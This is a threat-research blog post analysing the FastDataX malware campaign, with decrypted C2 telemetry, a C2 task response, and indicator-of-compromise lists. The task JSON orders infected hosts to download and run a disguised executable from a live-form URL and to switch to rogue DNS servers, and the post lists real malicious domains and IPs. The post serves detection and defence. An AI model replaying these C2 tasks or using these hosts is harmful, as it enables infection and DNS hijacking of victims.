Back in our July blog, FastDataX campaign, we shared some very compelling research with our readers - we were excited by the amount of interest it created.  Fast forward a few more months of research and we have more to share with you, including multiple accounts of infection observed throughout our Threat Protection System.  We even have real data to show you!

The background: FastDataX was first seen and alerted by Verint's TPS on networks being observed during June 2017. It was linked to the previously investigated DNSChanger using similarities in communication patterns, together with previously reported characteristics such as PS scripts and BITS jobs.

The following CNC Behavioral Alerts Screen displayed the infected clients communicating with several FastDataX domains from a predefined domain.

CNC Behavioral Alerts screen

Each one of the above alerts, contains data sent from the infected client to one of the C2 domains of the investigated FastDataX campaign.

 

Moving onto "Executor_activity"

We saw several types of communications to the C2 servers.  We also saw that all communication of the infected client to C2 contains "executor activity" encrypted data. This includes data regarding the infected client properties such as: OS type, whether the user is an admin, indications for running on VM and the current DNS configuration.  And, in addition, data regarding the malware activity on the victim, this included:

  • The activity type reported – included information such as whether the PE was installed/ uninstalled/ used persistence methods and their type - BITS jobs or PowerShell
  • Days elapsed from the infection
  • Total installations counts
  • Build, version, etc.

The following decrypted JSON payload is an in-the-wild capture of the posted data, sent daily by a Windows Scheduled task:

Executor activity
{
"executor_activity": {
"activity_type": 32,
"affiliate": "",
"build": 228,
"compilation_id": "6785398366757276059",
"days_elapsed": 1,
"dns": {
"hosts_active": "[REDACTED DNS IP1]",
"hosts_config": "[REDACTED DNS IP1];[REDACTED DNS IP2]"},
"external_id": "0",
"global_install_count": 1,
"hardware_id": "2526771032423317035",
"heur": {
"age": "258",
"fentropy": "4.33",
"flags": "0",
"ientropy": "2.65",
"installed": "65",
"newest": "1497916800",
"oldest": "1442534400",
"score": "2"
},
"install_count": 1,
"installer_id": "3549873876208096856",
"instance_id": "2429043188702154891",
"is_admin": true,
major": 1,
"minor": 1,
"os_id": 1000,
"process": "\\FastDataX\\fastdatax.exe",
"process_type": 1,
"product_name": "FastDataX",
"publisher_id": "0",
"register_date": "1497965194",
"register_dsrc": "1",
"report_id": "6775307447112491894",
"screen_x": 1680,
"screen_y": 1050,
"service_pack": 0,
"session_id": "123185999533423825",
"status": true,
"suspect_flags": 0,
"suspect_group": "",
"suspect_info": "",
"tag": "",
"tracker_id": "",
"tracker_id64": "0",
"user_time": 1498059948,
"version": 16842980,
"x64": true
}
}

The following is a breakdown of the above and executor activity.  Breaking down the JSON-formatted data, enabled us to gain a deeper insight into the contents, broadness and complexity of the campaign:

  1. The DNS configuration information "dns":-  Two values that designate the dns settings used by the infected machine       ("hosts_active"), and primary/secondary dns hosts that are currently configured on the endpoint - "hosts_config".

  2. Reference to the process fastdatax.exe and its path under "process":-  "\\FastDataX\\fastdatax.exe"

  3. Properties that are often used as an indication to Anti-VM mechanisms that can also accommodate other functionalities in an adware campaign. Such as:- screen_x, screen_y pixel size ("screen_x": 1680, "screen_y": 1050) and several entropy values.

  4. Properties of the client system to better catalogue the computer amongst many machines throughout the botnet:- "os_id": 1000, "x64": true, "is_admin": true

The C2 servers (see the full list of IOCS below) received the data described above, and responded with "503 Service Temporarily Unavailable":

Then, interestingly enough, from the beginning of November, 2017 and onwards, we observed that the C2 servers responded with different tasks and re-directions.

 

Check your BITS jobs – Could be Malware!

One of FastdataX persistency methods (described in our previous blog) uses BITS (Background Intelligent Transfer Service) jobs which generate the traffic to the C2 domains. BITS jobs are created during the installation, FastDataX.exe /in, and are set to run three times after every reboot: following reboot, after 6 hours and then after another 7 hours.

On the job run, initiates communication to several domains from a predefined subset of C2 domains (from fastdatax*.info).  The requests made by the BITS jobs, containing the "executor_activity" data described above, receive a response with redirections to download DLL files from another host, hosted on the same IP with the C2 servers - hausbauinfos[.]info.

pcap attached to the cnc traffic alert

In the above pcap screen capture, we see that the downloaded files appear with ".dat" file extension, and are immediately downloaded to the infected clients from the redirected path. However! - these are actually dll files.

hxxp://hausbauinfos.info/files/59/projectd.dat
hxxp://hausbauinfos.info/files/101/projectd.dat

 

Activity Tasks

During the installation of FastDataX, a scheduled task is set to run daily and performs communication to another subset of FastDataX*.info C2 domains. An encrypted response was received with the following tasks to perform:

  • Download an EXE file also appears with .dat extension from the host referred to in the previous redirection
  • Execute and eventually delete the file
  • Change the DNS configuration to use rogue DNS servers

Task response

{
"tasks": [
{
"id": "623289314434015000",
"update_id": "0",
"activity_id": "0",
"version": "1",
"execute_file": {
"download_url": "http://hausbauinfos.info/files/59/projecte.dat",
"download": 1,
"execute": 1,
"wait_exit": 1,
"wait_timeout": 120,
"delete": 1
}
},
{
"id": "523289314434015000",
"update_id": "0",
"activity_id": "0",
"version": "1",
"change_dns": {
"primary_dns": "82.163.143.176",
"secondary_dns": "82.163.142.178",
"flush_dns": 1
}
}
]
}

 

Rogue DNS

Shortly after, and using the TPS Network Forensics assistance, we saw the dns change taking place – it then started to address the dns queries to the rogue dns server:

The infected client in our laboratory had the rogue dns values in the Registry:

The change may be invisible to the infected client.  The dns redirection through these dns servers could be used to place adware or redirect some of the traffic to rogue sites to use as phishing, and so on.

The diagram shows the mutual interaction points and the different C2 roles throughout the campaign.

 

IOC lists:

The CnC domains:
81.171.14.67
hausbauinfos[.]info
fastdataxient[.]info
fastdataxify[.]info
fastdataxium[.]info
fastdataxcast[.]info
fastdataxfire[.]info
fastdataxfeed[.]info
fastdataxdigita[.]info
fastdataxstar[.]info
fastdataxcube[.]info
fastdataxster[.]info
fastdataxmage[.]info
fastdataxmancer[.]info
fastdataxmaven[.]info
fastdataxpro[.]info
fastdataxrunner[.]info
fastdataxace[.]info
astdataxopoly[.]info
fastdataxigy[.]info
fastdataxsage[.]info
fastdataxality[.]info
fastdataxate[.]info
fastdataxius[.]info
fastdataxize[.]info
fastdataxnik[.]info
fastdataxspace[.]info
fastdataxology[.]info
fastdataxspan[.]info
fastdataxtechnica[.]info
fastdataxizer[.]info
 
URLs:
hxxp://hausbauinfos.info/files/59/projectd.dat - dll file
hxxp://hausbauinfos.info/files/59/projecte.dat - exe file
hxxp://hausbauinfos.info/files/101/projectd.dat - dll file
 
Rogue DNS IPs in use:
82.163.143.176
82.163.142.178

So there you have it.  The latest findings from Verint’s research team!

Hope you enjoyed reading our blog.  If you have any questions, please feel free to contact us.